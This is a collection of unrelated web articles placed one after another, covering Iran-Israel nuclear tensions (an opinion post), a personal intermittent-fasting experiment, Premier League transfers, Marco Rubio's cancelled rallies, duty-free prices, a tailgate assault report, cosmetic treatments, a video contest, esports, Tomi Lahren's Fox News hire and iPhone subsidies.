No; what's important is the second assertion - that, should Iran develop nuclear weapons capacity, it would use it against Israel. This is a very serious accusation and so requires plenty of evidence to back it up. The standard of evidence required is especially high because the idea that Iran would use a nuclear weapon against another nuclear state is so counter-intuitive; states don't commit suicide. In reality, the only ‘evidence' used to suggest that Iran would use a nuclear weapon is a few statements by President Ahmadinejad to the effect that the ‘Zionist regime' will be destroyed. Therefore, by this standard, all we have to do to show that Iran would be justified in sending fighter jets to bomb Washington and Jerusalem is provided stronger evidence than a few abstract statements by a populist President who has no authority of matters of war or nuclear policy of a country that hasn't the ability to carry out those threats even if they were sincere that Israel and the U.S. pose a real threat to Iran.
That shouldn't be too hard to do. Israeli politicians (who most definitely do have authority over such matters) have been openly saying for months that, if dialogue fails to persuade Iran to halt uranium enrichment, Israel will not hesitate to use force. Statements by Israeli officials branding a nuclear Iran as "intolerable" and sanctioning the use of force in order to prevent one developing are numerous and sincere. Deputy Defense Minister Ephraim Sneh has been particularly prominent, declaring that the Iranian nuclear programme must be stopped "at all costs", noting further that although military action is a "last resort", the "last resort is sometimes the only resort". Moreover, unlike Iran, Israel has the ability to carry out its threats and, unlike Iran, which has not attacked a country outside its border for over 200 years, Israel has repeatedly shown a willingness to use aggressive force to further its strategic objectives.
Likewise, the U.S. has made it clear that it has no objection in principle to a military strike on Iran. For example, President Bush recently declared that he would "understand" if Israel chose to attack Iran, and has refused to rule out military action, stating that "all options are on the table." Meanwhile John Bolton, then U.S. ambassador to the UN, promised Iran "painful and tangible consequences" if it failed to halt enrichment.
But the threat posed by the U.S. and Israel has gone far beyond mere rhetoric. As I wrote in a previous post:
In September the U.S. started to plan the deployment of a major "strike group" of battleships to the Persian Gulf. In October, the U.S. led a naval war game off the Iranian coast intended to display to Iran both military might and aggressive intent, whilst a couple of days ago newspapers reported that both Britain and the U.S. are sending additional warships and fighter planes to the Gulf. The message couldn't be clearer: if the sanctions don't stop you, our military will.
Today, the Sunday Times reports that Israel is planning a nuclear strike on Iran. According to the Times, two Israeli air force squadrons are training to blow up an Iranian nuclear facility using ‘tactical' nuclear weapons (or "bunker busters"). According to one of the Times' sources inside the Israeli military,
"As soon as the green light is given, it will be one mission, one strike and the Iranian nuclear project will be demolished".
Indeed, Israeli pilots have already flown to Gibraltar in recent weeks to train for the journey to Iran, for which three possible routes have already been mapped out.
Israel's Foreign Ministry has denied the report, claiming,
"The focus of the Israeli activity today is to give full support to diplomatic actions and the expeditious and full implementation of Security Council resolution 1737. If diplomacy succeeds, the problem can be solved peaceably."
Except...that isn't really a denial, is it? The question is: what if diplomacy doesn't succeed? Olmert has refused to comment on the story, as has Avigdor Lieberman, the minister in charge of the Iranian 'strategic threat'. Their silence speaks volumes.
In America, House Majority Leader Steny Hoyer confirmed once again that the use of force against Iran remains an option. "I've not ruled that out," he said. Writing in Foreign Affairs, Ze'ev Schiff (chief military correspondent for Ha'aretz) reports that, despite pursuing diplomatic solutions to end the crisis, Israel has ‘nonetheless continued to relentlessly develop its military options'.
In short, Israel and the U.S. have not only talked about attacking Iran (although they have certainly done that; they have already started to translate those verbal threats into action on the ground. It cannot be seriously doubted that Israel and the U.S. pose a far greater threat to Iran than vice versa. Iranian citizens have far more justification to feel afraid than their Israeli and American counterparts. When Ephraim Sneh declares that Israel will stop Iran's nuclear programme "at all costs", Iranians know that the "costs" could well be their lives.
I am not here advocating an Iranian ‘preemptive' strike on Israel or the U.S. But those who argue for a U.S./Israeli first-strike on Iran should be, at least if they have even a modicum of respect for the basic moral principle of universality (that we apply to ourselves the same standards we apply to others, if not more stringent ones - to paraphrase Noam Chomsky). Those that don't - at last count, all of them - should not be taken seriously.
Cross-posted at The Heathlander
Note: This post is the second installment of “Optimize This” — a series in which we test the hottest productivity hacks. This post is the second installment of “Optimize This” — a series in which we test the hottest productivity hacks. Subscribe to The Hustle to get next week's straight to your inbox.
Intermittent fasting has improbably become the hottest productivity trend in Silicon Valley.
In an effort to harness focus and brainpower, entrepreneurs — or even whole teams of startup workers — starve themselves for large blocks at a time. Certain gurus go as long as 15 days without food.
Every faster I talked to gave the art of not eating glowing reviews. They said it made them feel like a million bucks — gave them the mental fortitude and physical jolt they always felt they lacked. In a Guardian interview, Phil Libin, the former CEO of Evernote, said fasting is one of the “top two or three most important things” he's ever done in his entire life. One person even described the feeling on day 3 of a fast as having “superpowers.”
So, in the spirit of being more productive (and wanting to bend metal with my mind), I decided to try it out for myself.
Unfortunately, what I found during my two-week fast is that I am not a superhero — just a normal, everyday, average American human who tirelessly complains when I don't get to eat when and what I want to.
But did it make me more productive?
The rules
The first thing I had to do was find a fasting guru — a certified expert who could set me on the right path, and guide me through the journey of starvation.
So, I turned to Geoff Woo, the CEO of nootropics company, HVMN.
Now, the Woo'ster is a real biohacking nut. He not only launched the well-known “smart drugs” company Nootrobox (now HVMN), but created WeFa.st — a Slack-based fasting support group where fasters trade research, coordinate events, and taunt each other with food. For a first time faster, I was in pretty good company.
“It's going to suck,” Geoff promised early on. “There's an adaptation period your body has to go through after going from a standard Western diet (carb-heavy) to not eating. [In the beginning] you're going to be caught in a state where you have low blood sugar, and it won't be fun.”
Geoff threw out two options for a fast I could try: one for super fit people who work out daily, and one for those who are not so fit. I fit in the latter category, so he suggested I try the 36 hour Monk Fast.
Here's how it works:
Monday AM: I eat a healthy breakfast
Monday—Wednesday PM: I drink nothing but water (or low-cal coffee) for 36 hours
Thursday AM—Sunday PM: I transition to a “16:8” regimen, or 16 hours of fasting, followed by 8 hours of regular meals (AKA, skip breakfast and eat lunch + dinner)
Repeat the cycle starting Monday
With a plan in place, I took a deep breath and prepared for life as a productive superhuman.
Week 1
Monday AM
I woke up early and ate my only meal for the next 36 hours: my favorite Trader Joe's organic frosted cherry pop tart.
Then, I threw on a pot of coffee and opened my computer. It didn't dawn on me until later that I should've had a much bigger breakfast for my last meal.
Monday—Wednesday PM
As Monday wore on, I could only think about what I had gotten myself into. Not exactly a productive use of my mental energy.
By the end of the first day, I'd become acutely aware of the privilege I enjoy as a writer: Would I be able to maintain this lifestyle were I on my feet all day? Were I more physically active, could I sustain fasting? My guru, Geoff, had regaled me with tales about how he works out while fasting.
On Tuesday, I figured I'd go on a jog and take my mind off my new urge to hunt and eat a wild Los Angeles street animal.
It didn't turn out well.
I made it once around my block before I fully lost feeling in my face and had to hobble home to confirm it was still attached to my body. (Sure enough, a bright red tomato with blue eyes stared back at me in the mirror.)
Weak throughout the rest of the day, I never fully recovered from my run, and became very unpleasant to be around. My girlfriend had the pleasure of being off work that day — and as I rattled and cursed my computer, she decided to start her own fast… from me.
I remained positive. Everyone I spoke to had told me the first two days were the hardest. I just had to bide my time until that all-encompassing third day came around — AKA, the day I was told I'd become Productivity Boy: killin' it by day, cashing hard-earned checks by night!
On Wednesday I woke up, good news, I didn't feel hungry anymore. But, alas, no superpowers — unless feeling shaky and hollow is a superpower, but I certainly haven't seen Marvel or DC make any movies about that guy.
Later that day, feeling pissed and petulant, I fended off my bi-weekly dinner with friends, as I knew I wouldn't be able to resist our usual nacho-esque eats were they thrust in front of me.
But hey, canceling on them freed me up to do more work late that night, soooo, productivity point? Yeah, sure. But I still had to muster the energy to focus, which didn't exactly happen until I broke my fast — we'll give it a half productivity point.
It was truly remarkable how fast I came back to my normal self after I shoved food into my mouth hole that night — healthy fats only, of course.
Thursday AM—Sunday PM
I entered into my 16:8 food regimen on Thursday, meaning for the rest of the week (Thursday to Sunday), I would have to skip breakfast, but lunch and dinner were there for the taking.
To make sure I did everything in my power to be more productive during my experiment, I chose to eat a healthy fat meal that consisted of only a few things: a mashy delight of two over easy eggs, two avocados, and unsalted almonds.
All in all, Monday through Wednesday was a shaky, light headed hell. Instead of dialing in, I found it almost impossible to dial down the noise of my body screaming at me to eat something.
Thursday through Sunday was fine. Normal energy, but definitely had to make a conscious choice to watch what I ate. Aka no fun.
Week 2
Monday AM
This time, I ate a heartier “farewell” meal: eggs and avocados, of course.
Against the wishes of my confused body, I felt more prepared and confident going into week 2. That is, until I realized I made a huge mistake.
While double-checking my 36 hour fasting instructions, I realized I was, in fact, not doing a 36 hour fast at all, but the 60-hour “Himalayan” fast regimen intended for fit people — a fast that an expert like Geoff never would've recommended for someone as pathetic as I.
Going back and doing the math, eating breakfast on Monday, then fasting until dinner on Wednesday is approximately 60 hours. For an entire week, I'd endured the more difficult fast.
For consistency's sake, I decided to stick with the regimen for week 2.
Monday—Wednesday PM
For the remainder of Monday (2 days before Halloween), I grappled with the fact that I couldn't eat 40 mini-Snickers bars.
But on Tuesday, I made a breakthrough: my body came to peace with the fasting regimen — my hunger had dissipated like last week, and interestingly enough the shakes went away.
By Wednesday I felt my body had pretty much fully acclimated. No headaches, no shakes, and no hunger pains, but that's not to say I wasn't hungry.
This was definitely the highest point of my two week fast. I had learned to deal with the pain, my focus had all but adapted, but still, I didn't feel any extra energy. These all powerful productivity gains from not eating were still nowhere to be found.
Thursday AM—Sunday PM
By this point, I still felt perplexed about the notion of fasting for productivity.
Yes, not thinking about food is one less thing to focus on — but does it really free up that much more time for work? I certainly didn't feel that to be the case.
And more generally, why is making more time for work something regular fasters wish to achieve? I get trying to be more healthy, but do we really need to cut out essential, everyday things to accomplish more with our careers? Is that healthy? What ever happened to work/life balance?
I needed to talk to a doctor.
A little doctor visit
In my research, I found intermittent fasting to be quite polarizing amongst medical professionals, with many conflicting studies and articles both for and against the trend.
Studies conducted by Harvard's School of Public Health found that “intermittent fasting and manipulating mitochondrial networks may increase [one's] lifespan.” But other doctors were concerned that intermittent fasting could reboot your system in a bad way, ridding the body of fresh, white blood cells, and leaving the body with older, less healthy ones.
Silicon Valley doctor, Molly Maloof, explained to me that, while she believes there are health benefits to fasting, it's important to know what you're getting into.
She recommends “strategic fasting,” like fasting during a long flight abroad to help regulate your circadian rhythms, or on weekends, to help “reacquaint your body with hunger.”
One thing the scientific wellness doctor doesn't recommend is fasting during the workweek, when people are generally more stressed: “The most important thing with fasting is to understand your level of stress management,” she tells me.
“If you're under the gun at work and you feel that you're already at a high stress level, fasting will only hinder your focus… When you're stressed, the most important thing you can do is feed your body.”
Unfortunately it took fasting for me to realize I have very poor stress management.
Fasting: yay or nay?
Did fasting help me become more productive? No.
Does that mean it doesn't work for others? Absolutely not. Everyone's body is different, and it's never a bad thing to experiment to find what works.
It wasn't all useless though. Fasting made me realize that this crazy little thing called eating pretty much shapes my every waking moment — not out of necessity, but out of ritual. I've conditioned myself to eat when I feel like it because I can, not because I need to. And that is something I need to be better about both mentally and physically.
A 60-hour fast (or even a 36-hour fast) may not be for me, but it taught me a lot about myself. Like, maybe I should exercise more than twice a year, and also maybe I shouldn't eat 40 Snickers bars on a bad day because I can.
It also taught me that I am even worse at math than I originally thought.
Manchester United manager David Moyes has asked the club's fans to trust him over his decision to send Wilfried Zaha out on loan.
The England winger struggled to secure a place in the Manchester United lineup throughout the first half of the season and joined Cardiff City on loan in January for the remainder of the season - but Moyes insists the move is in the best interest of all concerned.
"It is good for him, it is good for his development. Everybody will have a chance to see how he plays," said Moyes.
"The idea is he shows what he can do and comes back a better player for Manchester United."
Zaha helped create both goals in Cardiff debut
Sir Alex Ferguson's final signing as United boss was expected to make a big impact at Old Trafford this season.
Zaha started in Moyes' first competitive in charge of United - the FA Community Shield against Wigan in August - but since then only started one further game and made four substitute appearances.
The 21-year-old made an impressive start to his Cardiff, playing 53 minutes in their 2-1 Premier League victory against Norwich City - and played a role in both goals for Ole Gunnar Solskjaer's men.
But despite the impressive start, Moyes insisted Zaha's move was right decision.
“The idea is he shows what he can do and comes back a better player for Manchester United” David Moyes
"At times you have to believe what the manager is seeing as well," he added.
"There is big competition for those wide areas.
"When I came in, I had Antonio Valencia, Nani and Ashley Young. Then we had the emergence of Adnan (Januzaj). Shinji (Kagawa) can play off one of the sides.
"I have seen Wilfried training every day as well. I am privy to that."
Florida Sen. Marco Rubio has abruptly cancelled rallies scheduled in Kentucky and Louisiana fueling speculation that he may be bowing out of the race for the GOP presidential nomination.
Rubio fared poorly in the Super Tuesday state races, only pulling out a victory in Minnesota. Texas Sen. Ted Cruz, who fared better, has been calling on Rubio to drop out so there is a single candidate who can compete against Donald Trump, who so far has seemed unstoppable.
The Courier-Journal in Kentucky reported about Rubio's cancellation of the Friday rally in Lexington.
Tyler Glick, a spokesman for Anne Northrup, Rubio's campaign chairwoman in Kentucky, said the campaign hasn't provided any more information about the cancellation.
Marco Rubio cancels Kentucky rally https://t.co/l7HzkxIQZI via @courierjournal — Zeke Miller (@ZekeJMiller) March 3, 2016
Rubio had been scheduled to hold a 10:15 a.m. rally at the Lexington Center on Friday, one day before the Kentucky Republican presidential caucus in which more than 40 delegates are up for grabs.
Quietly last night Rubio also cancelled a rally in Boca Raton, WBRZ is reporting.
Marco Rubio quietly cancels Baton Rouge rally https://t.co/odgCHwmyoA — Zeke Miller (@ZekeJMiller) March 3, 2016
Individuals who signed up for tickets to see Rubio received an email Wednesday that the event was canceled.
“In order to use Marco's time as efficiently as possible before Saturday's contests, Marco will not be making a stop in Louisiana Friday night,” the email read.
Cancelling one rally isn't anything to write home about, but cancelling two back-to-back rallies is fueling speculation that Rubio may be willing to bow out of the race.
A scheduled rally Saturday in Jacksonville, Florida, is still scheduled with Republican New Mexico Gov. Susana Martinez.
Both the Rubio and the Cruz camp have been desperately trying to convince the other side to drop out to challenge Trump. So far, nobody has blinked.
Facebook has greatly reduced the distribution of our stories in our readers' newsfeeds and is instead promoting mainstream media sources. When you share to your friends, however, you greatly help distribute our content. Please take a moment and consider sharing this article with your friends and family. Thank you.
This article is over 1 year old
Consumer group finds products such as gin, Toblerone and Lego cheaper in supermarkets or online
Airport duty-free prices not always cheapest, says Which?
Bargain airport prices for favourites such as gin and Toblerone are now likely to be cheaper at the supermarket, Which? has found.
A 360g bar of Toblerone cost £4 at Bristol World Duty Free but £3 at Asda, while a 70cl bottle of Tanqueray gin cost £18 at Heathrow Terminal 2 and £15 at Morrisons, the consumer group found.
Despite a common assumption that airport shopping will cut out VAT, shoppers could save £21 by buying a 100ml bottle of Eternity for Men eau de toilette on Amazon for £25 rather than at Birmingham World Duty Free for £46.
The Lego Star Wars Millennium Falcon was £20 cheaper at Toys R Us online than at Gatwick South World Duty Free.
Which? said it was “stunned” to find the SanDisk Extreme Plus 64GB camera memory card selling for £73 more at Glasgow International's Dixons Travel than at Currys online.
The organisation checked all the prices between 10 and 13 March. They are rounded to the nearest £1 and include the cost of delivery for online orders.
The watchdog also said consumers could find savings at airport shops, noting that it found the iPad mini 2 and Fitbit Flex 2 both for £10 less at Dixons Travel at Glasgow International airport than online at John Lewis.
It urged shoppers to “always do your research before you head to the airport to make sure the ‘deal' is not actually dearer than you find on the high street or online”.
Copyright by WNCN - All rights reserved Photo Courtesy: Ryan Pruett
Copyright by WNCN - All rights reserved Photo Courtesy: Ryan Pruett
By WNCN Staff - SHELBY, N.C. (WNCN) - A UNC fan from Shelby who said he was assaulted by a group of Clemson students during the ACC Championship Game in Charlotte on Dec. 5 now says he is not sure who assaulted him.
Ryan Pruett, 33, who described himself as a die-hard University of North Carolina basketball fan, said he did not have tickets to the game but had a last-minute opportunity to tailgate.
Pruett originally stated that members of a specific Clemson fraternity attacked him while he was at the game, but later said he wasn't sure who attacked him.
Pruett told WNCN the name of the fraternity he thought had attacked him but WNCN did not identify the fraternity since no charges had been filed. Fox Carolina in Greenville, South Carolina, also spoke to Pruett and did report the name of the fraternity he accused.
Before the attack, Pruett said he was with friends in a parking lot using two permits. He described the scene as a normal tailgate with kids throwing a football around the lot.
Around noon, three chartered buses pulled into the lot, he said. He said members of a specific Clemson fraternity were on the bus. Pruett said the fraternity brothers told him and other tailgaters around him to tell him if they got out of hand or if their music got too loud.
"It was unreal how many cases of beer the kids were carrying out of the buses," Pruett said.
Between 4 and 5 p.m., Pruett said the situation got out of control.
Pruett said the Clemson students stole food from other tailgaters and even stole his friend's generator.
One frat member attempted to steal a liquor bottle from a neighboring tailgate, Pruett said. The man dropped the bottle when a woman caught him, causing it to shatter.
During that same time, three men and a woman were near Pruett's vehicle when they tore off his UNC flag. Pruett said he exited his vehicle and confronted them.
Pruett said they apologized and blamed their actions on alcohol.
"I don't know why someone would disrespect someone else's property," Pruett said.
Between 15 and 30 minutes later, Pruett said he and his friend were listening to the game in his vehicle. He said members of the fraternity tailgate opened the back hatch of his vehicle and started pouring beer in his car.
Pruett said he and his friend got out of their car and were met with 15 guys.
The next thing Pruett remembers is waking up in the hospital.
Pruett suffered a broken nose and his eye socket was broken. His friend was also injured when a beer bottle was shattered over his head. Pruett's friend required stitches.
"I don't remember talking to the police or getting in the ambulance," Pruett said.
Clemson spokeswoman Cathy Sams told Fox Carolina, "University police and administrators are investing allegations that Clemson students were involved in a disturbance in Charlotte while tailgating at the ACC Championship Game, and we have been told that at least one person was injured and property damaged. These allegations, if true, do not reflect the values and character of Clemson University or the majority of our students, and could lead to serious sanctions and possible criminal charges."
Pruett said all he wants is to feel better. He admitted he had been drinking during the tailgate but had stopped two to three hours before the assault.
"I could have been dead," he said.
Pruett said he has three children and they could have a single mom if the assault had gone differently.
"Now I wish I had never gone to the game," he said.
The Pruett family contacted Fox Carolina and said they mistakenly identified the wrong fraternity tent when they first reported the allegation. As of Tuesday night, the family said they were no longer asking for a further investigation and apologized to the Clemson fraternity.
Pruett's brother also retracted a statement and apologized stating, "it was a case of mistaken identity and as a brother of the victim I was quick to place blame," Fox Carolina reported.
by Reza Sadrian, M.D.
Question: I'm thinking of undergoing a non-invasive facial rejuvenation procedure to brighten my complexion. Do I still have time to get this done before the upcoming holiday season and if so, what are my options?
Answer: Yes, there is plenty of time to schedule a non-invasive facial treatment prior to the holidays. Non-invasive procedures require very little down-time (3 to 7 days depending on the depth of the treatment).
The winter months are an opportune time to schedule many facial procedures due to the weaker winter UV solar rays and can provide your facial skin with a renewed, healthy-looking glow.
Holiday vacation time also provides the perfect opportunity to take advantage of time off from work.
Chemical Peels and Laser Resurfacing Treatments
You may want to schedule a resurfacing laser treatment or mild chemical peel that will address fine lines, wrinkles, blotchiness, sunspots or uneven skin tones.
These procedures can be conducted in an outpatient environment, typically in a medical spa facility without anesthetic. Depending on the depth of the laser setting or the strength of the chemical peel, recovery time will be relatively short.
You may experience a redness of the surface skin and/or mild surface skin peeling for a period of several days. This can be combated with physician-recommended medical grade skincare products and plenty of rest and relaxation accompanied by increased water consumption.
Injectable Products for Deeper Facial Lines
In conjunction with a facial treatment, we often recommend a variety of clinical injectable products that will diminish deeper lines on the forehead, and “smile lines” around the mouth or “frown lines” between the eyes in the brow area.
We find that many of our patients want to look their best for holiday-related photos, and injectable products can soften crevices and related shadows captured by a camera.
We advise a consultation with a board-certified plastic surgeon prior to scheduling any cosmetic treatment.
(published November 26, 2013)
Reza Sadrian, MD is one of very few plastic surgeons on a nationally recognized level dually certified in plastic and reconstructive surgery as well as oral and maxillofacial surgery. He is a Diplomate, American Board Plastic Surgery and serves as Medical Director for the Plastic Surgery and Laser Institute of San Diego. In addition to performing cosmetic plastic surgery procedures in his state-of-the-art AAAASF certified surgical suites, he offers medical grade skin care products, non-surgical treatments (including injectable Botox and fillers) and laser treatments. Dr. Sadrian can be reached at (858) 457-1111 or via the web at sadriancosmeticsurgery.com.
Silva, Salah and Lukaku have been among the big summer transfers
Swansea's Gylfi Sigurdsson has been valued at £50m, Everton have spent £90m and Manchester United bought Romelu Lukaku for £75m - so is Newcastle boss Rafael Benitez right to call this summer's transfer window "a little bit crazy"?
Premier League clubs' spending has already surpassed £500m since the end of last season - and business analysts Deloitte say they are on course to set another new record by 31 August.
Teams spent a record £1.165bn last summer, rising to £1.38bn after the January window.
Football finance expert Rob Wilson says the market "hyper-inflation" means anyone selling to an English club is adding "at least 40%, if not 50%, to the deal".
And football agent Jon Smith says a £30m transfer - such as goalkeeper Jordan Pickford's move from Sunderland to Everton - is "the new norm".
This week Deloitte released its annual football finances, which revealed record revenues of £3.6bn for Premier League clubs in 2015-16 - and that was the year before an improved TV broadcasting rights deal kicked in.
It predicted that figure would be more like £4.5bn at the end of this coming season.
Its report also said overall debt is falling and forecast the 20 clubs combined would return to profitability in the coming years.
Is Rafa right - are prices 'crazy'?
This transfer window comes a year after the new £5.136bn TV deal kicked in - a 71% rise on the £3bn negotiated in 2013.
In the 2014 window - also one year after the previous broadcast deal was struck - Lukaku, then 21, was sold by Chelsea to Everton for £28m. The Belgian forward's move to Manchester United is for an initial £75m, which represents a 168% increase in value in three years.
Also in 2014, Swansea signed Icelandic playmaker Sigurdsson from Tottenham for a reported £6.8m. The Welsh club now value the Leicester and Everton target at £50m - a 635% increase in value.
"Revenues keep going up, predominantly because of the rise in broadcast rights values," said Chris Stenson, a senior consultant from Deloitte's sports business group.
"Every Premier League club now has more money and are willing to spend that on players," he said.
"It is the wealthiest league in the world and increasing its value makes it more attractive to sponsors and commercial partners.
"So far we estimate Premier League clubs have spent about £500m in the transfer window, compared with £340m at the equivalent stage last year."
Biggest transfer fees paid by Premier League clubs so far - summer 2017 Romelu Lukaku [Everton - Manchester United] £75m, rising to £90m Antonio Rudiger [Roma - Chelsea] £29m, could rise to £33.3m Alexandre Lacazette [Lyon- Arsenal] £46.5m rising to £52.6m Victor Lindelof [Benfica - Manchester United] £31m Bernardo Silva [Monaco - Manchester City] £43m Michael Keane [Burnley - Everton] Rising to £30m Ederson Moraes [Benfica - Manchester City] £35m Jordan Pickford [Sunderland to Everton] £25m, rising to £30m Mohamed Salah [Roma - Liverpool] £34m Davy Klaassen [Ajax - Everton] £23.6m
Biggest transfer fees paid by Premier League clubs - summer 2014 Angel di Maria [Real Madrid - Manchester United] £59.7m Ander Herrera [Athletic Bilbao - Manchester United] £29m Alexis Sanchez [Barcelona - Arsenal] £35m Romelu Lukaku [Chelsea - Everton] £28m Diego Costa [Atletico Madrid - Chelsea] £32m Luke Shaw [Southampton - Manchester United] £27m (could rise to £31m) Eliaquim Mangala [FC Porto - Manchester City] £32m Adam Lallana [Southampton - Liverpool] £25m Cesc Fabregas [Barcelona - Chelsea] £30m Dejan Lovren [Southampton - Liverpool] £20m
Revenue recap
In 2015, the Premier League sold television rights to its games for a record £5.136bn.
The new three-year broadcast deal started for the 2016-17 season, with payments made throughout the campaign.
The amount the Premier League shares out to clubs rose last season from a total of £1.64bn to £2.4bn.
Bottom club Sunderland earned the same amount as the previous year's winners Leicester (£93m) while Chelsea received £150m, an increase of almost £60m on the previous 12 months.
Is £30m becoming the norm?
Once considered a landmark fee, £30m deals are now becoming more regular. There were 10 for at least that amount last summer, and already eight which could yield that much this time round.
Pickford became the most expensive British keeper in history after Everton paid £25m - rising to what would be a club-record £30m - to sign the 23-year-old from Sunderland. Everton also spent £30m to bring in Michael Keane from Burnley.
"There are players like him who would probably have been worth £12m a couple of years ago going for £30m," said Smith, formerly a players' agent.
"£30m is a very big number, but it's become the norm."
However Wilson, of Sheffield Hallam University, said it was unclear whether transfer values might still rise further over the next few years.
"I can't see the value of the English deal increasing because Sky and BT Sport haven't picked up the subscription numbers they were hoping for," he said.
"Logic therefore says the value of transfers won't rise over the next five years, although there is room for increased international TV rights packages."
Do you have the talent to be Wordner's next Glub Star?
Just create a music video for the Wordner theme song, post it to YouTube, and enter it by May 1st. First place winner receives $100 in Amazon cash plus a Wordner party game!
Here are the complete contest rules.
Three Chances To Win!
First Place (chosen by Wilbur): $100 in Amazon cash + 1 Wordner party game
Second Place (chosen by video views on YouTube): $50 in Amazon cash + 1 Wordner party game
Third Place (chosen by Wilbur): $25 in Amazon cash + 1 Wordner party game
How To Enter
Use your talent to create a music video for the Wordner theme song. You can listen to the song and download it here. The song's music and lyrics are also available. Your video can be animated or live action. Be creative! Upload your video to YouTube. Sorry only YouTube videos will be considered. Submit your entry along with a link to your music video, your name, and a valid email address. You must do this before the 11:59 Pacific Time on May 1, 2014.
Submit Your Music Video Here
Here is a sample music video by Black Box Baroque for inspiration!
How The Contest Works
Create and submit your music video before the deadline of May 1, 2014 at 11:59PM Pacific Time. As videos are received, they will be evaluated and posted to the contest video gallery (coming soon).
You are encouraged to share your video with your friends and start accumulating views on it. Also, the sooner you create your video, the more time you will have to gather views!
After May 1st, no further videos will be accepted into the contest. Entrants will have until May 11, 2014 at 11:59PM Pacific Time to share and accumulate views on their videos.
On May 12th, Wilbur will select the most creative entry as the First Place winner. The Second Place winner will be selected by noting the video with the most number of views on YouTube. Finally, the Third Place winner will be selected by Wilbur from the remaining entries.
Other Information
Here is some other important stuff to keep in mind:
You may enter the contest as many times as you like, but you can only win once. All contest entrants must be age 13 or older and provide working email addresses in order to be contacted if they win. Winners who do not claim their prizes within 30 days of being contacted will forfeit them. Wordner (acting as Wilbur) will judge the First Place and Third Place winners based upon their uniqueness and creativity. The Second Place winner will be the video with the most number of YouTube views as noted on May 12, 2014 at 12:00AM. Should the First Place winner end up being the same as the Second Place winner, the entrant will be given First Place and vacate Second Place. Then, the video with the second highest number of views will be selected as the Second Place winner. In the case of a tie for the Second Place winner (two videos have the same number views), Wordner will select a single winner from the two. Wordner reserves the right to disqualify entries for any reason including use of offensive language or imagery, cheating, and not adhering to the contest rules. All eligible entries will be posted to the Contest Gallery. Videos not listed in the gallery are ineligible for consideration in the contest. All contest times are in Pacific Time. Contest entries may be submitted between April 3, 2014 at 12:00AM and May 1, 2013 at 11:59PM. No entries will be accepted after that time. The contest period will close on May 12, 2014 at 12:00AM. At that time, the YouTube views for each entry will be logged. Contest winners will be notified on May 12, 2014. Contest void where prohibited.
Congratulations! You've read everything. Now get out there and start glubbin'!
Tonight our League of Legends team will be attending the WCG NA National Finals and attempt to keep up their winning streak going as they have not lost a single match since they joined Team Dignitas.The team won one of the qualifiers and is now one of the last four teams in the NA finals.
The winner of this tournament gets to represent North America at the WCG Grand Finals in Korea later on this year. Tonight we will face Curse Gaming at 03:00 CET (21:00 EST) and the team will try to repeat yesterday's Rampage cup result where they beat Curse 2-0.
Update: The match has been delayed, we will keep you updated.
WCG NA LoL Semi Final: Team Dignitas vs Curse﻿
Team Dignitas vs. Curse
Tuesday 4th October 03:00 CET
Summoners Rift
Team Dignitas [ 0 - 0 ] Curse
scarra
"Feeling pretty confident going into the game, we played them on sunday and played fairly well against them. We still think they are a strong team, and can't take these games lightly, especially since there's such a huge prize on the line﻿."
The conservative pundit will opine on the news and will work on "an FNC digital product currently in development."
In mid-August, conservative media personality Tomi Lahren told The Hollywood Reporter that news networks need to hire more conservatives as commentators.
"It seems as though the only diversity some networks won't embrace is diversity of opinion," said Lahren, who had been suggested as a potential fit for a CNN contributor role in the wake of Jeffrey Lord's and Kayleigh McEnany's departures.
CNN, as it turns out, wasn't in the cards, but Lahren was able to snag a contributor role on Fox News, where she will discuss the news on the network's opinion shows and work on "an FNC digital product currently in development."
"I am blessed and honored to join the Fox News team," Lahren said in a statement on her Facebook page. "This exciting new step will allow me to give voice to all the America-loving patriots who have had my back since day one. I will remain a solid and passionate advocate for you."
Lahren's tenure as a Fox News contributor kicks off tonight, when she will appear on Sean Hannity's show. While Lahren is not new to television, she made her name primarily on nonlinear platforms like Facebook, where she developed a huge following. She's also hosted shows for two conservative networks, Glenn Beck's The Blaze and One America News Network.
"I enter the lion's den every chance I get because I know it's he only way to get the message out to traditionally non-conservative audiences," Lahren told THR about doing punditry on more left-leaning networks. "I can take a hit and bounce back."
Apple The Apple iPhone 4S with its 3.5-inch, 960 x 640 LCD screen.
How much would you pay for an iPhone if you had to pay full price? More than the $200 or $300 you did for the smartphone you currently own? How many people even know the iPhone's actually a lot more expensive than one of Apple's baseline $500 iPads? Would you fork over $600? $700? Upwards of $800 for the current top-end model?
Carriers have been playing hide-the-real-price with phones for as long as I've owned a cellphone, luring you into a multiyear contract in trade for shaving off one-half to two-thirds of a phone's standalone price. And with today's phones-that-are-really-mini-PCs, the cost difference can be so dramatic, that if you already have a contract with a carrier and want to pick up a newer model phone before you qualify for an upgrade, it's sometimes cheaper to opt out of your contract and pay the cancellation fee than to pay full price for the new phone (I saved over $300 doing this when switching from a low-end LG flip-phone, under contract, to an iPhone 4 in February 2011).
(MORE: Claim: Next iPhone to Have Huge 4.6-inch ‘Retina' Display)
Most of us know about the subsidies (though I daresay most couldn't tell you the real price of a smartphone on the spot). Virtually all of us are grateful for them. So your eyebrows may elevate when I say that Apple — that is, AAPL, the company's stock name — was just downgraded from “buy” to “neutral” for the first time since October 2011 by an analyst whose rationale is that the days of cheap phones courtesy those precious carrier subsidies are coming to an end.
“We expect post-paid wireless operators to remain firm in their plan to stunt the pace of phone upgrades in 2012 and we expect to see some initial evidence of their success in the current quarter,” wrote Walter Piecyk, a BTIG Research analyst in a note released Monday (via CNBC). “This will increase the need for Apple to grow its business in the pre-paid dominated emerging market space, in which handset subsidies are a rarity and the $600 ASP (average selling price) of the iPhone represents a big chunk of a household's monthly income.”
It's important to note that Apple's bill of materials (including manufacturing) for the iPhone 4S, as estimated by iSuppli, is $196 (16GB), $215 (32GB) and $254 (64GB). Assuming iSuppli's in the ballpark, Apple's cost is essentially at parity with the subsidized price on the 16GB iPhone 4S ($199 with contract), but the disparity leaps to $85 and $145 on the 32GB ($299 with contract) and 64GB models ($399 with contract) respectively. You have to factor in packaging, shipping and marketing, of course, which means Apple's probably taking a hit on the 16GB model, but that may not be the case on the two higher-end versions, and it's certainly not the case if we're measuring in terms of the iPhone's actual retail list: $650 (16GB), $750 (32GB) and $850 (64GB). There's a lot of theoretical cost headroom in these devices, and that's well before we start throwing around phrases like “economies of scale.”
(MORE: How Apple's iPhone Actually Hurts AT&T, Verizon and Sprint)
